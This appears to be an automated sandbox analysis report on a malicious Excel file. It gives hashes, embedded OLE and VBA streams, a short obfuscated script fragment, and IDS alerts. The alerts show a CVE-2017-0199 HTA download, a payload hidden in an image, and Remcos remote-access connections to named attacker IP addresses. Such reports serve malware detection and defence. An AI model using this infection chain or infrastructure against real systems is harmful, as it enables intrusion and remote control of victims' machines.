                                                                                                                                                                                                                    SHA-512:ADC073AEE0AA3C6C7F6BF08606D616BF64F7ECBFA9A095361185DF8D041998505D044306AF933482F11DC6D5D484154954CB315AC8E767DAD19094F9BDDB2C2A
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:
                                                                                                                                                                                                                    private function platirrostro(argillita, socraticamente, esfenoide, gallinheira, alabardino)
                                                                                                                                                                                                                        dim filter
                                                                                                                                                                                                                        dim dialect
                                                                                                                                                                                                                        dim e
                                                                                                                                                                                                                        dim res
                                                                                                                                                                                                                        dim formattedText
                                                                                                                                                                                                                        dim flags
                                                                                                                                                                                                                        flags = 0
                                                                                                                                                                                                                        if esfenoide.ArgumentExists(NPARA_FILTER) then
                                                                                                                                                                                                                            filter = esfenoide.Argument(NPARA_FILTER)
                                                                                                                                                                                                                            dialect = URI_WQL_DIALECT
                                                                                                                                                                                                                        end if
                                                                                                                                                                                                                        if esfenoide.ArgumentExists(NPARA_DIALECT) then
                                                                                                                                                                                                                            dialect = esfenoide.Argument(NPARA_DIALECT)
                                                                                                                                                                                                                        end if
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1085952
                                                                                                                                                                                                                    Entropy (8bit):7.283616680066594
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:KmzHJEHAfwu4hjD3DERnLRmF8DNtrf1I3dewux+8h+4OrysUn90SYXzxK3IFH7FX:tLw/hjbARM8rq34+94OrysU94F1F3zx
                                                                                                                                                                                                                    MD5:A9C211C9947B3D94F6EEF22940DD2FA0
                                                                                                                                                                                                                    SHA1:64B01BED2170C17DDC263E89F8074B83CDADA987
                                                                                                                                                                                                                    SHA-256:F665E7845A04CC6C7A5EFE8B3548DEF8FDAC5075962B7941760E3D1FD2AEC0D8
                                                                                                                                                                                                                    SHA-512:C0C584C0B57FE993482CC23E78B68FE0C2E0C13E0011FCA96A0B51EE6E91E9F205D43B51B21E3C454441A70CF07FEDC0742567860F9AE92C4BE1BD1513F45ED0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:23:56 2024, Security: 1
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1085952
                                                                                                                                                                                                                    Entropy (8bit):7.283616680066594
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:KmzHJEHAfwu4hjD3DERnLRmF8DNtrf1I3dewux+8h+4OrysUn90SYXzxK3IFH7FX:tLw/hjbARM8rq34+94OrysU94F1F3zx
                                                                                                                                                                                                                    MD5:A9C211C9947B3D94F6EEF22940DD2FA0
                                                                                                                                                                                                                    SHA1:64B01BED2170C17DDC263E89F8074B83CDADA987
                                                                                                                                                                                                                    SHA-256:F665E7845A04CC6C7A5EFE8B3548DEF8FDAC5075962B7941760E3D1FD2AEC0D8
                                                                                                                                                                                                                    SHA-512:C0C584C0B57FE993482CC23E78B68FE0C2E0C13E0011FCA96A0B51EE6E91E9F205D43B51B21E3C454441A70CF07FEDC0742567860F9AE92C4BE1BD1513F45ED0
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 08:27:12 2024, Security: 1
                                                                                                                                                                                                                    Entropy (8bit):7.263958635177038
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                                                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                                                                                                                                    File name:QPS-36477.xls
                                                                                                                                                                                                                    File size:1'094'656 bytes
                                                                                                                                                                                                                    MD5:912e8c547d1e8dd1e12afbd819074b30
                                                                                                                                                                                                                    SHA1:96fd97dc12ae0a792c85fdf7ec9a2424a90097b3
                                                                                                                                                                                                                    SHA256:b86e4c334af2fdbe88b3cb50cd85c47eac10a9e9b9ac7c0dd656e37cabce7a5a
                                                                                                                                                                                                                    SHA512:b22b475560991182a6f3e29504ebabcad865c40b1688e75ad575c2fabed7cd47be71f328518a777daea92632c0ebcdbe2ce3c215d089b2549c84ad0e4cd8ef9f
                                                                                                                                                                                                                    SSDEEP:12288:ImzHJEHAfwu4hCD3DERnLRmF8D3Prf1T3dmFupFZ6pxw3FQNXcp5tkM3r4r:DLw/hCbARM8fN3VbgxmScpB4r
                                                                                                                                                                                                                    TLSH:A535DF83EA1D4F62CE45423066F7177A1320CC83D522872B22F5772939FBAD06956FAD
                                                                                                                                                                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                                    Number of OLE Files:1
                                                                                                                                                                                                                    Has Summary Info:
                                                                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                                                                    Encrypted Document:True
                                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                                                                                                                    Flash Objects Count:0
                                                                                                                                                                                                                    Contains VBA Macros:True
                                                                                                                                                                                                                    Code Page:1252
                                                                                                                                                                                                                    Author:
                                                                                                                                                                                                                    Last Saved By:
                                                                                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                                                                                    Last Saved Time:2024-10-08 07:27:12
                                                                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                                                                    Security:1
                                                                                                                                                                                                                    Document Code Page:1252
                                                                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                                                                    Shared Document:False
                                                                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                                                                    Application Version:786432
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet1"
                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                                                                    

                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                                                                                                                                                    VBA File Name:Sheet2.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet2"
                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                                                                    

                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                                                                                                                                                    VBA File Name:Sheet3.cls
                                                                                                                                                                                                                    Stream Size:977
                                                                                                                                                                                                                    Attribute VB_Name = "Sheet3"
                                                                                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                                                                    

                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                                                    Stream Size:985
                                                                                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                                                                    Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                                                    Attribute VB_Creatable = False
                                                                                                                                                                                                                    Attribute VB_PredeclaredId = True
                                                                                                                                                                                                                    Attribute VB_Exposed = True
                                                                                                                                                                                                                    Attribute VB_TemplateDerived = False
                                                                                                                                                                                                                    Attribute VB_Customizable = True
                                                                                                                                                                                                                    

                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:244
                                                                                                                                                                                                                    Entropy:2.889430592781307
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:200
                                                                                                                                                                                                                    Entropy:3.2603503175049817
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . } S . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:244
                                                                                                                                                                                                                    Entropy:2.701136490257069
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                                                    Stream Size:90976
                                                                                                                                                                                                                    Entropy:1.885975041684416
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:20
                                                                                                                                                                                                                    Entropy:0.5689955935892812
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:4
                                                                                                                                                                                                                    Entropy:0.8112781244591328
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . .
                                                                                                                                                                                                                    Data Raw:00 00 03 00
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD0018D4CE/Contents
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                                                    Stream Size:197671
                                                                                                                                                                                                                    Entropy:6.989042939766534
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A52B4/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A52B4/Package
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                    Stream Size:50945
                                                                                                                                                                                                                    Entropy:7.631071730257267
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A56E1/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.219515110876372
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A56E1/Package
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                    Stream Size:31124
                                                                                                                                                                                                                    Entropy:7.746149934092623
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                                    Entropy:4.25248375192737
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:484
                                                                                                                                                                                                                    Entropy:3.922883556049869
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/\x5SummaryInformation
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:19956
                                                                                                                                                                                                                    Entropy:3.056974324659501
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A5E23/Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:95624
                                                                                                                                                                                                                    Entropy:3.889652332882722
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/\x1CompObj
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:94
                                                                                                                                                                                                                    Entropy:4.345966460061678
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:64
                                                                                                                                                                                                                    Entropy:2.935667186688699
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/MBD002A6130/CONTENTS
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:PDF document, version 1.7
                                                                                                                                                                                                                    Stream Size:21760
                                                                                                                                                                                                                    Entropy:7.954015192696893
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FC/Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:218908
                                                                                                                                                                                                                    Entropy:7.606771386739727
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:MBD001CA3FD/\x1Ole
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:434
                                                                                                                                                                                                                    Entropy:4.980156456466635
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                    Stream Size:339321
                                                                                                                                                                                                                    Entropy:7.998763504504139
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Stream Size:525
                                                                                                                                                                                                                    Entropy:5.255382494742475
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:104
                                                                                                                                                                                                                    Entropy:3.0488640812019017
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:2644
                                                                                                                                                                                                                    Entropy:3.9919548639670577
                                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                                                                                                                    General
                                                                                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                                                                                    CLSID:
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Stream Size:553
                                                                                                                                                                                                                    Entropy:6.357900004738902
                                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . ' . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T15:23:40.699677+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49162 | 192.3.220.40 | 80 | TCP
2024-10-08T15:23:40.699679+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49162 | TCP
2024-10-08T15:23:43.864625+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 192.3.220.40 | 80 | TCP
2024-10-08T15:23:43.864669+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49164 | TCP
2024-10-08T15:24:00.186433+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.227.242 | 443 | 192.168.2.22 | 49166 | TCP
2024-10-08T15:24:01.381632+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49171 | TCP
2024-10-08T15:24:01.381632+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49171 | TCP
2024-10-08T15:24:01.627421+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49172 | 192.3.220.40 | 80 | TCP
2024-10-08T15:24:02.926947+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49173 | 135.148.195.248 | 6875 | TCP
2024-10-08T15:24:03.976682+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 135.148.195.248 | 6875 | TCP
